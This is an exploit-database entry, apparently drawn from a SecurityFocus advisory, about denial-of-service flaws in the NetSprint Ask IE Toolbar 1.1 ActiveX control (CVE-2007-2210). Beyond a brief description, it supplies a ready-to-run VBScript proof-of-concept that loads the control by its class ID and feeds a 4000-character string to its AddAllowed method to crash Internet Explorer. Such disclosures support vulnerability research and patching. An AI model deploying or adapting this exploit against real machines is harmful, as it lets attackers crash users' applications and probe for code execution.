NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities



EKU-ID: 34999 CVE: CVE-2007-2210;OSVDB-35413 OSVDB-ID:
Author: Michal Bucko Published: 2007-04-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/23535/info

NetSprint Ask IE Toolbar ActiveX control is prone to multiple denial-of-service vulnerabilities.

Exploiting these issues allows remote attackers to crash applications that employ the vulnerable controls (typically Microsoft Internet Explorer). Attackers may potentially exploit these issues to execute code, but this has not been confirmed.

NetSprint Ask IE Toolbar 1.1 is vulnerable; other versions may also be affected.

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:89D30B4C-2408-4E78-A334-8FF8A9713EA7' id='target' />
<script language='vbscript'>

arg=String(4000, "A")

target.AddAllowed arg

</script></job></package>